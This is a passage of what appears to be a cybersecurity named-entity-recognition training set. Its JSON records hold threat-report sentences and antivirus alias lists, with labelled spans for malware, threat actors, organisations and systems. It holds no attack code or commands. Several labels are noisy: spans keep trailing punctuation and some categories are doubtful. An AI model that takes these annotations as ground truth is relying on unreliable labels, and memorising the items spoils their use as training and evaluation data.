"info": {"id": "cyner2_train_001123", "source": "cyner2_train"}} {"text": "This mechanism is similar to premium rate SMS messages but Trojans do not need to send any SMS in this case – they just need to click on a button on a web-page with WAP-billing.", "spans": {"MALWARE: Trojans": [[59, 66]]}, "info": {"id": "cyner2_train_001124", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Keylogger.88 Win32.Backdoor.Ciadoor.13.y.2.Pack Backdoor/Ciadoor.13 Backdoor.Ciadoor!4PAHfVwkIvk W32/BackdoorX.FCC Backdoor.Ciadoor Win32/Ciadoor.J BKDR_CIADOOR.E Win32.Stration Backdoor.Win32.Ciadoor.cia Trojan.Keylogger.88 Backdoor.Win32.Ciadoor.13 Trojan.Keylogger.88 Trojan.DownLoader.62487 BDS/Ciadoor.13.A BKDR_CIADOOR.E Backdoor.Win32.Ciadoor!IK Backdoor/Ciadoor.az Backdoor/Win32.Ciadoor VirTool:Win32/VB.L Backdoor.Win32.Ciadoor.60726 Trojan.Keylogger.88 W32/BackdoorX.FCC OScope.Backdoor.VB Win32/Ciadoor.13 Backdoor.Win32.Ciadoor W32/Ciadoor.13!tr.bdr BackDoor.Ciadoor.3.AH Bck/Ciadoor.FQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001127", "source": "cyner2_train"}} {"text": "Indicators for the TripleNine backdoor used by an actor.", "spans": {"MALWARE: TripleNine backdoor": [[19, 38]], "THREAT_ACTOR: actor.": [[50, 56]]}, "info": {"id": "cyner2_train_001128", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Pakes Troj.W32.Pakes!c Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.ZCVD-4026 Trojan.Win32.Encoder.euxeay Trojan.Encoder.15133 Trojan.Pakes.Win32.41830 Trojan.Win32.Injector Backdoor.Backboot.s TR/Crypt.Xpack.frnur W32/Injector.DSRQ!tr Trojan.Graftor.D67C49 Ransom:Win32/Criakl.D Backdoor.Backboot Ransom.FileCryptor Trj/GdSda.A Trojan.Pakes!3sBO8Lnk+/0 Win32/Trojan.7d4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001129", "source": "cyner2_train"}} {"text": "Some of the stolen Skype databases included chat history going back to 2012 and activity as recent as January 
2014", "spans": {"SYSTEM: Skype databases": [[19, 34]]}, "info": {"id": "cyner2_train_001130", "source": "cyner2_train"}} {"text": "A backdoor also known as: Rootkit.Win32.Xanfpezes!O Trojan.Rootkitdrv Rootkit.Xanfpezes.Win32.13 Trojan/Xanfpezes.bru Trojan.Symmi.DC01B Win32.Trojan.WisdomEyes.16070401.9500.9873 W32/Trojan.VQCP-2977 Win32/Rootkit.KX RTKT_HIDEPROC.BB Win.Trojan.Hideproc-77 Rootkit.Win32.Xanfpezes.bru Riskware.Win32.HideProc.crvalg Trojan.Fakealert.28173 RTKT_HIDEPROC.BB BehavesLike.Win32.PUP.wc Downloader.Delphi TrojanDropper.Delf.cdq RiskWare[RiskTool]/Win32.HideProc Win32.Hack.Rootkit.kcloud Rootkit.Win32.Xanfpezes.bru Backdoor/Win32.Xanfpezes.C131817 TrojanDownloader.Banload HackTool.Win32.ProcHide.ad Rootkit.Xanfpezes!kqbV3Mm24ww", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001131", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Nsis.Ocna.eqkruk Trojan.InstallCoreCRTD.Win32.3467 Win32/RA-based.AB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001132", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.Mariofev.O Win32.Worm.Mariofev.O WORM_MARIOFEV.TO Win32.Trojan.WisdomEyes.16070401.9500.9961 W32/Backdoor2.CSNQ W32.Spamuzle WORM_MARIOFEV.TO Win.Spyware.53855-2 Worm.Win32.Pinit.piv Win32.Worm.Mariofev.O Trojan.Win32.Pinit.bmcqcd W32.W.Pinit.piv!c Win32.Worm.Pinit.Ljul Win32.Worm.Mariofev.O Win32.Worm.Mariofev.O BackDoor.Zapinit.81 BehavesLike.Win32.VTFlooder.nc Trojan-Ransom.HydraCrypt W32/Backdoor.CNPZ-8382 TrojanDropper:Win32/Mariofev.H Worm.Win32.Pinit.piv Worm.Pinit Worm.Mariofev!HCn84tcMG2k", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001133", "source": "cyner2_train"}} {"text": "Readers who are interested in this campaign should start with our first blog that lays out the overall functionality of the malware and introduces its many components.", "spans": {"THREAT_ACTOR: campaign": [[35, 43]], "MALWARE: malware": 
[[124, 131]]}, "info": {"id": "cyner2_train_001135", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Novel.DOS.1 PSW.Novel TROJ_PSWNOVEL.A Trojan-PSW.DOS.Novel Trojan.Dos.Novel.fnqs DOS.S.PSWNovel.7120 Troj.PSW.DOS.Novel!c TrojWare.PSW.Novel TROJ_PSWNOVEL.A Trojan/PSW.Novel TR/PSW.Novel Trojan[PSW]/DOS.Novel Trojan-PSW.DOS.Novel Login.7120 Dos.Trojan-qqpass.Qqrob.Aenr W32/HLLW_NewStory.A!tr.pws Win32/Trojan.99d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001137", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Losicoa.S18597 Trojan.Zusy.D39F92 TrojanDownloader:Win32/Qdownb.A Trojan.Win32.BHO Win32/Trojan.cb1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001138", "source": "cyner2_train"}} {"text": "The group effectively controls an arsenal of over 85 million mobile devices around the world.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "SYSTEM: mobile devices": [[61, 75]]}, "info": {"id": "cyner2_train_001139", "source": "cyner2_train"}} {"text": "Last week, a new version was spotted in the wild, and based on our analysis, we believe that this variant is the one used in a recent attack against San Francisco Municipal Transport Agency SFMTA.", "spans": {"MALWARE: variant": [[98, 105]], "ORGANIZATION: San Francisco Municipal Transport Agency SFMTA.": [[149, 196]]}, "info": {"id": "cyner2_train_001140", "source": "cyner2_train"}} {"text": "We observed 3 squatting domain registrations related to a victim in the media sector.", "spans": {"ORGANIZATION: victim": [[58, 64]], "ORGANIZATION: the media sector.": [[68, 85]]}, "info": {"id": "cyner2_train_001143", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Razy.D1558E Win32.Trojan.WisdomEyes.16070401.9500.9566 Trojan.MSIL.Crypt W32/Trojan.UXDY-5009 TR/Kryptik.udtxo TrojanDropper:MSIL/Vibes.A Trj/GdSda.A MSIL/Kryptik.GXI!tr Win32/Trojan.855", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_001144", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 PowerShell.DownLoader.36 BehavesLike.Win32.Trojan.dh Trojan-Dropper.PowerShell.Ploty W32/Trojan.ZKDA-3628 TrojanDropper:PowerShell/Ploty.C Trj/CI.A JS/Psdl.A!tr.dldr Win32/Trojan.f31", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001145", "source": "cyner2_train"}} {"text": "Analysis of HackingTeam Android malware", "spans": {"ORGANIZATION: HackingTeam": [[12, 23]], "MALWARE: Android malware": [[24, 39]]}, "info": {"id": "cyner2_train_001146", "source": "cyner2_train"}} {"text": "We refer to this backdoor as T9000, which is a newer variant of the T5000 malware family, also known as Plat1.", "spans": {"MALWARE: backdoor": [[17, 25]], "MALWARE: T9000,": [[29, 35]], "MALWARE: variant": [[53, 60]], "MALWARE: T5000 malware family,": [[68, 89]], "MALWARE: Plat1.": [[104, 110]]}, "info": {"id": "cyner2_train_001147", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Pottieq Win32.Trojan.WisdomEyes.16070401.9500.9786 Trojan.Win32.Aura.evxqqg Trojan.Encoder.2667 BehavesLike.Win32.BadFile.th TrojanDropper.FrauDrop.annq Trojan[Ransom]/Win32.Aura Ransom:Win32/Pottieq.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001150", "source": "cyner2_train"}} {"text": "The Trapwot malware family is considered scareware or rogue antivirus because it attempts to mislead victims into believing their machine is infected with malware.", "spans": {"MALWARE: Trapwot malware family": [[4, 26]], "MALWARE: scareware": [[41, 50]], "MALWARE: rogue antivirus": [[54, 69]], "SYSTEM: machine": [[130, 137]]}, "info": {"id": "cyner2_train_001152", "source": "cyner2_train"}} {"text": "In comparison to other threat groups, TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger.", "spans": {"THREAT_ACTOR: threat groups, TG-3390": [[23, 
45]], "SYSTEM: Microsoft Exchange servers": [[88, 114]], "MALWARE: custom backdoor": [[123, 138]], "MALWARE: credential logger.": [[143, 161]]}, "info": {"id": "cyner2_train_001153", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer Win32.Trojan.WisdomEyes.16070401.9500.9999 MSIL.Packed.Skaldring.D Win32.Trojan.Fsysna.Hwwo Trojan.DownLoader14.15241 BehavesLike.Win32.Trojan.cc Trojan.Crypt TR/Dropper.MSIL.rpjh Trojan.Barys.DCAFA Trojan:Win32/Bshan.A Trojan.Fsysna! MSIL/Injector.PKZ!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001155", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Alien Trojan.Zusy.D3E06C Win32.Trojan.WisdomEyes.16070401.9500.9952 Worm.Win32.Alien.oe W32/Trojan.RDLO-7674 WORM/Alien.ugxeq TrojanDownloader:VBS/Kaloki.A Worm.Win32.Alien.oe Trj/CI.A Win32/Trojan.9de", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001157", "source": "cyner2_train"}} {"text": "The malware was included as an attachment intended to trick the user into opening the malware.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: malware.": [[86, 94]]}, "info": {"id": "cyner2_train_001158", "source": "cyner2_train"}} {"text": "Cybercriminals, however, are equal opportunity exploiters, so just recently an interesting targeted malware campaign was found to be using another document vulnerability.", "spans": {"THREAT_ACTOR: Cybercriminals,": [[0, 15]], "THREAT_ACTOR: exploiters,": [[47, 58]], "THREAT_ACTOR: malware campaign": [[100, 116]], "VULNERABILITY: vulnerability.": [[156, 170]]}, "info": {"id": "cyner2_train_001159", "source": "cyner2_train"}} {"text": "The backdoor code was found between Display Widgets version 2.6.1 released June 30 and version 2.6.3 released September 2.", "spans": {}, "info": {"id": "cyner2_train_001160", "source": "cyner2_train"}} {"text": "However, over the past few years, we have been tracking a separate, less widely known suspected 
Iranian group with potential destructive capabilities, whom we call APT33.", "spans": {"THREAT_ACTOR: Iranian group": [[96, 109]], "THREAT_ACTOR: APT33.": [[164, 170]]}, "info": {"id": "cyner2_train_001162", "source": "cyner2_train"}} {"text": "If the registration is successful, it uses the received unique identifier to further communicate with the C&C server and receive commands.", "spans": {}, "info": {"id": "cyner2_train_001164", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Avosim Backdoor.Trojan W32/Trojan.BPEV-1033 BDS/Avosim.azmiq W32/ISMdoor.5E1D!tr Trj/GdSda.A Win32/Backdoor.ed0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001165", "source": "cyner2_train"}} {"text": "run a malicious DEX file without notification,", "spans": {"MALWARE: malicious": [[6, 15]]}, "info": {"id": "cyner2_train_001166", "source": "cyner2_train"}} {"text": "A further blog by FireEye titled Acknowledgement of Attacks Leveraging Microsoft Zero-Day provided additional useful information.", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "VULNERABILITY: Leveraging Microsoft Zero-Day": [[60, 89]]}, "info": {"id": "cyner2_train_001168", "source": "cyner2_train"}} {"text": "The Sage ransomware variant appears to have been out of circulation for a while in the malware scene.", "spans": {"MALWARE: The Sage ransomware variant": [[0, 27]], "MALWARE: malware": [[87, 94]]}, "info": {"id": "cyner2_train_001170", "source": "cyner2_train"}} {"text": "A backdoor also known as: PDF/Trojan.PGPW-0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001171", "source": "cyner2_train"}} {"text": "After further research, we found the malware has been repackaged into several pirated iOS apps that are available for download via multiple channels.", "spans": {"MALWARE: malware": [[37, 44]]}, "info": {"id": "cyner2_train_001172", "source": "cyner2_train"}} {"text": "Crypt0l0cker has gone through a long evolution, the adversaries are 
updating and improving the malware on a regular basis.", "spans": {"MALWARE: Crypt0l0cker": [[0, 12]], "THREAT_ACTOR: the adversaries": [[48, 63]], "MALWARE: malware": [[95, 102]]}, "info": {"id": "cyner2_train_001173", "source": "cyner2_train"}} {"text": "The Sofacy group, also known as APT28 and Sednit, is a fairly well known cyber espionage group believed to have ties to Russia.", "spans": {"THREAT_ACTOR: The Sofacy group,": [[0, 17]], "THREAT_ACTOR: APT28": [[32, 37]], "THREAT_ACTOR: Sednit,": [[42, 49]], "THREAT_ACTOR: cyber espionage group": [[73, 94]]}, "info": {"id": "cyner2_train_001177", "source": "cyner2_train"}} {"text": "Even harder is when you do not receive telemetry data from products that contains information about infected machines.", "spans": {"SYSTEM: infected machines.": [[100, 118]]}, "info": {"id": "cyner2_train_001178", "source": "cyner2_train"}} {"text": "What is more, they are tied to the attacked applications, which creates an illusion that they are legitimate and belong to the corresponding software.", "spans": {"SYSTEM: applications,": [[44, 57]]}, "info": {"id": "cyner2_train_001180", "source": "cyner2_train"}} {"text": "However, there are several good reasons for an attacker to use this particular feature.", "spans": {"THREAT_ACTOR: attacker": [[47, 55]], "VULNERABILITY: feature.": [[79, 87]]}, "info": {"id": "cyner2_train_001181", "source": "cyner2_train"}} {"text": "NCC Group is monitoring a number of OOXML and RTF techniques our red team has been using since September 2016, which uncovered multiple malicious documents from around August 2017.", "spans": {"ORGANIZATION: NCC Group": [[0, 9]], "ORGANIZATION: red team": [[65, 73]]}, "info": {"id": "cyner2_train_001182", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Win32.Sality!O Tool.Transmit.Win32.60 Win32.Trojan.WisdomEyes.16070401.9500.9549 not-a-virus:NetTool.Win32.Transmit.a Riskware.Win32.Transmit.exlakv Trojan.Win32.Z.Transmit.67795 
Backdoor.Win32.VanBot.24 Tool.Transmit BehavesLike.Win32.VirRansom.kc Trojan/Pakes.emd not-a-virus:NetTool.Win32.Transmit.a Trj/CI.A Trojan.TenThief.DNFTrojan.tnh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001185", "source": "cyner2_train"}} {"text": "The attacks leveraged a malware named EyePyramid to target a dozen politicians, bankers, prominent freemasons and law enforcement personalities in Italy.", "spans": {"MALWARE: malware": [[24, 31]], "MALWARE: EyePyramid": [[38, 48]], "ORGANIZATION: politicians, bankers, prominent freemasons": [[67, 109]], "ORGANIZATION: law enforcement personalities": [[114, 143]]}, "info": {"id": "cyner2_train_001186", "source": "cyner2_train"}} {"text": "Recently, we've seen a number of reports related to 9002 remote access Trojan RAT.", "spans": {"MALWARE: 9002 remote access Trojan RAT.": [[52, 82]]}, "info": {"id": "cyner2_train_001187", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kadena.B4 Trojan.Ipatre.1 Win32.Trojan.Kryptik.lx TROJ_UPATRE.SMX7 Win32.Trojan.Kryptik.CI Trojan.Win32.Kryptik.expevv Trojan.Win32.Z.Upatre.71168.AI TrojWare.Win32.TrojanDownloader.Upatre.EMD Trojan.DownLoader26.15470 TROJ_UPATRE.SMX7 W32/Trojan.DPWC-8231 TR/Crypt.ZPACK.karjs Trojan/Win32.Upatre.R160419 Trojan-Downloader.Win32.Waski W32/Kryptic.ABGK!tr Win32/Trojan.8c5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001188", "source": "cyner2_train"}} {"text": "When clicked it launches an infection chain made up of JavaScript, and a final shellcode payload that makes use of DNS to load additional shellcode from a remote command and control server.", "spans": {"SYSTEM: DNS": [[115, 118]], "MALWARE: shellcode": [[138, 147]]}, "info": {"id": "cyner2_train_001191", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.IRC.MRAK.A Virus.Win32.Mkar!O W32.Mkar.A4 Backdoor.IRC.MRAK.A Virus.Mkar.Win32.5 Backdoor.IRC.MRAK.A Win32.Trojan.WisdomEyes.16070401.9500.9981 
W32/Mkar.C W32.Marak PE_MKAR.A.DAM Win.Trojan.Mkar-3 Virus.Win32.Mkar.a Backdoor.IRC.MRAK.A Virus.Win32.Mkar.cyau Backdoor.IRC.MRAK.A Win32.Mkar.A Backdoor.IRC.MRAK.A Win32.HLLP.Mrak.9 PE_MKAR.A.DAM BehavesLike.Win32.Koobface.mc W32/Mkar.LNJG-1026 WORM/Mkar.A Backdoor:Win32/Mkar.A Win32.Mrak.A Virus.Win32.Mkar.a Backdoor.IRC.MRAK.A Malware/Win32.Mkar.C408081 Win32/Mkar.A Win32.Mkar.E Virus.Win32.Mkar W32/Mkar.D W32/Mkar.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001192", "source": "cyner2_train"}} {"text": "CrowdStrike Services Inc., our Incident Response group, was called by the Democratic National Committee DNC, the formal governing body for the US Democratic Party, to respond to a suspected breach.", "spans": {"ORGANIZATION: CrowdStrike Services Inc.,": [[0, 26]], "ORGANIZATION: the Democratic National Committee": [[70, 103]], "ORGANIZATION: formal governing body": [[113, 134]], "ORGANIZATION: US Democratic Party,": [[143, 163]]}, "info": {"id": "cyner2_train_001193", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Buzus.32878.D TrojanDownloader.Small.grk Trojan/Downloader.Small.grk Trojan.DL.Small.ALEE Win32/SlhBack.B W32/Downldr2.BDIE W32/DLoader.DZIA Trojan.Downloader-20119 Trojan-Downloader.Win32.Small.grk Trojan.Downloader.Delf.OJS Backdoor.Win32.SlhBack.B Trojan.Downloader.Delf.OJS Trojan.DownLoader.50258 TR/Dldr.Small.grk.24 TROJ_DELF.HXO Heuristic.BehavesLike.Win32.Backdoor.H Win32/SillyDl.ETL W32/Downldr2.BDIE TrojanDownloader.Small.zhn Trojan-PWS.Win32.OnLineGames!IK TrojanDownloader:Win32/Small.AAAL Trojan.Win32.Downloader.35496 Trojan.Downloader.Delf.OJS Win-Trojan/Downloader.32877 Trojan-Downloader.Win32.Small.grk Trojan.DL.Small.AJEZ Trojan.DL.Win32.Small.grk Trojan-PWS.Win32.OnLineGames W32/Small.GRK!tr Trj/Downloader.REB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001194", "source": "cyner2_train"}} {"text": "The McAfee Labs research team has tracked an 
advanced persistent threat for the past couple of months.", "spans": {"ORGANIZATION: McAfee Labs research team": [[4, 29]], "THREAT_ACTOR: advanced persistent threat": [[45, 71]]}, "info": {"id": "cyner2_train_001196", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Vilsel!O BackDoor-EZO.a Trojan/Bewymids.a Trojan.Vilsel!fjBL+ssgwjs Infostealer.Hoardy Win.Trojan.Vilsel-265 Trojan.Win32.Vilsel.aybc Trojan.Win32.Vilsel.djwjt Trojan.Win32.S.Vilsel.61544[h] Trojan.DownLoader2.44985 Trojan.Vilsel.Win32.20666 BehavesLike.Win32.Downloader.km Trojan/Vilsel.uxx TR/Bewymids.A.2 Trojan/Win32.Vilsel Win32.Troj.Vilsel.kcloud Trojan:Win32/Bewymids.A Trojan/Win32.Vilsel Spyware.Infostealer.Flea.APT Trojan.Vilsel Win32.Trojan.Vilsel.Phqe Trojan.Win32.Vilsel W32/Vilsel.AYBC!tr Trojan.Win32.Bewymids.BA Win32/Trojan.bab", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001199", "source": "cyner2_train"}} {"text": "As the attack is currently active, it effectively turns compromised sites into attack surfaces against their visitors.", "spans": {"ORGANIZATION: visitors.": [[109, 118]]}, "info": {"id": "cyner2_train_001200", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Stegvob.C9 Win32.Trojan-Downloader.Delf.c WORM_TOPHOS.BKD Trojan.Win32.Dropper.aas Win32.HLLW.Tophos.1 WORM_TOPHOS.BKD Trojan.Symmi.DD7FE Worm:Win32/Tophos.B BScope.Worm.Tophos.2612 Backdoor.Bot Virus.Win32.Sality W32/Tophos.AAA!tr Win32/Trojan.278", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001201", "source": "cyner2_train"}} {"text": "Aside from stealing keystrokes, passwords, Bitcoins, system information, and files on disk, NionSpy also known as Mewsei and MewsSpy can record video using the webcam, audio using the microphone, take screenshots, and use infected machines as a proxy tunnel to connect to other machines within the network.", "spans": {"MALWARE: NionSpy": [[92, 99]], "MALWARE: Mewsei": [[114, 
120]], "MALWARE: MewsSpy": [[125, 132]], "SYSTEM: machines": [[231, 239], [278, 286]], "SYSTEM: network.": [[298, 306]]}, "info": {"id": "cyner2_train_001203", "source": "cyner2_train"}} {"text": "The actors behind this adware utilize a simple yet effective approach – they download a popular, legitimate Android application, decompile it, add their malicious routines, then repackage the Android application package APK.", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "MALWARE: adware": [[23, 29]], "SYSTEM: Android application,": [[108, 128]], "MALWARE: malicious routines,": [[153, 172]], "SYSTEM: the Android application package APK.": [[188, 224]]}, "info": {"id": "cyner2_train_001204", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Trojan.FlyStudio.Win32.19742 Trojan/FlyStudio.ooa Trojan.Zusy.D38745 Win32.Trojan.FlyStudio.we Win32.Application.PUPStudio.B Trojan.Win32.Dwn.eeopgy Trojan.DownLoader24.6094 Trojan.Win32.Antavmu TR/Winder.sbcde Trojan[Dropper]/Win32.Sysn Trojan:Win32/Winder.A RiskWare.GameHack Backdoor.Farfli!+OYA++JJfG8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001205", "source": "cyner2_train"}} {"text": "#ISMDoor impersonates ZAHRANI an electrical equipment and engineering company in Saudi Arabia and ThetaRay.", "spans": {"MALWARE: #ISMDoor": [[0, 8]], "ORGANIZATION: ZAHRANI": [[22, 29]], "ORGANIZATION: electrical equipment": [[33, 53]], "ORGANIZATION: engineering company": [[58, 77]], "ORGANIZATION: ThetaRay.": [[98, 107]]}, "info": {"id": "cyner2_train_001206", "source": "cyner2_train"}} {"text": "In the third intrusion, the Mandiant Incident Response team was contacted after UNC961 had compromised the victim and transferred access to UNC3966.", "spans": {"ORGANIZATION: the Mandiant Incident Response team": [[24, 59]], "THREAT_ACTOR: UNC961": [[80, 86]], "THREAT_ACTOR: UNC3966.": [[140, 148]]}, "info": {"id": "cyner2_train_001207", "source": "cyner2_train"}} {"text": "Modification of 
KBOT from the Carberp leak.", "spans": {"MALWARE: KBOT": [[16, 20]], "MALWARE: Carberp": [[30, 37]]}, "info": {"id": "cyner2_train_001208", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Lossymem MSIL/Filecoder.LI Ransom_LTML.THAOJH Trojan.Win32.Ransom.ewugaq Ransom_LTML.THAOJH Trojan-Ransom.FileCoder W32/Trojan.QFKV-3532 TR/Ransom.xaclx Trojan/Win32.Ransom.C2353444 Trojan.Ransom.LongTermMemoryLoss Trj/GdSda.A MSIL.Trojan-Ransom.LTML.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001209", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Floxif.S1578425 Trojan.Rozena.Win32.59165 BKDR_CCHACK.A W32/CChack.A Trojan.Ccleaner BKDR_CCHACK.A Win.Spyware.CCBkdr-6336251-2 Win32.Backdoor.Forpivast.B Backdoor.Win32.InfeCleaner.a Trojan.PRForm.A Trojan.Win32.Floxif.estdxt Trojan.Win32.Z.Floxif.5000118 Trojan.PRForm.A Trojan.CCleaner.2 BehavesLike.Win32.Dropper.rc Backdoor.Hacked.CCleaner W32/CChack.SQBY-7641 Trojan[FakeAV]/Win32.CCleaner Backdoor.Win32.InfeCleaner.a Win-Trojan/Floxif.9791816 Backdoor.InfeCleaner Trj/CI.A Trojan.PRForm.A Win32.Backdoor.Infecleaner.Lkns Win32/Trojan.54c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001210", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exp.OLE.CVE-2015-1641.E Trojan.Mdropper Win32/Exploit.CVE-2015-1641.V TROJ_MDROP.YYSRH TROJ_MDROP.YYSRH RTF/Trojan.BTCC-93 Trojan[Exploit]/Win32.CVE-2015-1641 Exploit.CVE-2015-1641 Exploit.CVE-2015-1641", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001213", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Downloader.CXJ O97M.Drop.P W97M.Downloader.CXJ VBA.Trojan.Obfuscated.u VBA/Obfuscated.C W2KM_GOLROTED.AGG W97M.Downloader.CXJ W97M.Downloader.CXJ Trojan.Ole2.Vbs-heuristic.druvzi W97M.Downloader.CXJ W97M.Downloader.CXJ W97M.DownLoader.1033 W2KM_GOLROTED.AGG W97M.Downloader.CXJ WM/Obfuscated.C!tr virus.office.obfuscated.1", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001215", "source": "cyner2_train"}} {"text": "A new custom backdoor used by the Mustang Panda APT group is targeting a governmental institution in Taiwan, according to ESET researchers who have analyzed samples of MQsTTang, a new type of malware.", "spans": {"MALWARE: new custom backdoor": [[2, 21]], "THREAT_ACTOR: Mustang Panda APT group": [[34, 57]], "ORGANIZATION: a governmental institution": [[71, 97]], "ORGANIZATION: ESET researchers": [[122, 138]], "MALWARE: MQsTTang,": [[168, 177]], "MALWARE: malware.": [[192, 200]]}, "info": {"id": "cyner2_train_001216", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9970 Backdoor.Trojan.B Win.Trojan.10430800-1 Trojan.Win32.Pugeshe.ctexqh BDS/Pugeshe.A.2 Trj/Ziyang.A Win32.Backdoor.Pugeshe.Phzt Trojan.Ziyanzho!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001217", "source": "cyner2_train"}} {"text": "The original code of BankBot was divulged on a Russian forum in late 2016, and you can read more about that here.", "spans": {"MALWARE: The original code": [[0, 17]], "MALWARE: BankBot": [[21, 28]], "THREAT_ACTOR: a Russian forum": [[45, 60]]}, "info": {"id": "cyner2_train_001218", "source": "cyner2_train"}} {"text": "Based on observations on infrastructure, and the state of the code, we believe these incidents represent the first attempts to deploy the agent, and features such as persistence do not appear to work.", "spans": {"SYSTEM: infrastructure,": [[25, 40]], "MALWARE: agent,": [[138, 144]]}, "info": {"id": "cyner2_train_001219", "source": "cyner2_train"}} {"text": "The malware contains an old school exclusion list that performs extremely rapid double word comparisons rather than the slower but far more common string comparisons to identify which process to ignore, and internally validates the identified account data through an implementation of the Luhn algorithm.", "spans": 
{"MALWARE: malware": [[4, 11]]}, "info": {"id": "cyner2_train_001221", "source": "cyner2_train"}} {"text": "Symantec's latest whitepaper documents multiple Black Vine operations that have been occurring since 2012.", "spans": {"ORGANIZATION: Symantec's": [[0, 10]], "THREAT_ACTOR: Black Vine operations": [[48, 69]]}, "info": {"id": "cyner2_train_001223", "source": "cyner2_train"}} {"text": "A backdoor also known as: HT_BLADABINDI_GL190001.UVPM HT_BLADABINDI_GL190001.UVPM Backdoor.MSIL.Bladabindi.alfk Trojan.Win32.Bladabindi.exqcus Ht.Bladabindi.Gl190001!c BehavesLike.Win32.Dropper.wc Trojan:Win32/Trogle.A Backdoor.MSIL.Bladabindi.alfk Trj/CI.A Msil.Backdoor.Bladabindi.Tbsy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001224", "source": "cyner2_train"}} {"text": "A backdoor targetting Linux also known as: Backdoor.Linux.Tsunami.A Linux.Kaiten.B ELF_KAITEN.SMK Trojan.Tsunami.excyez Linux.BackDoor.Tsunami.123 ELF_KAITEN.SMK ELF/Backdoor.MRMO- LINUX/Tsunami.ojldj Trojan.Backdoor.Linux.Tsunami.1 Backdoor.Linux.Tsunami!c Linux.Backdoor.Tsunami.Wrpx", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001225", "source": "cyner2_train"}} {"text": "August contains stealing functionality targeting credentials and sensitive documents from the infected computer.", "spans": {"MALWARE: August": [[0, 6]], "SYSTEM: infected computer.": [[94, 112]]}, "info": {"id": "cyner2_train_001228", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan/VB.htj Trojan.Heur.RX.ED14C7A Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win.Trojan.VB-8430 Trojan-Dropper.Win32.Daws.enmy Troj.Downloader.W32.VB.ldQ2 TrojWare.Win32.Trojan.VB.~DQ Trojan.VB.Win32.6994 BehavesLike.Win32.Trojan.nm Trojan.Win32.VB Trojan/VB.fgm Backdoor:Win32/Lordly.A Trojan-Dropper.Win32.Daws.enmy Trojan/Win32.Downloader.R12171 Trojan.VB!jnJsu+mHRvk W32/VB.JHO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
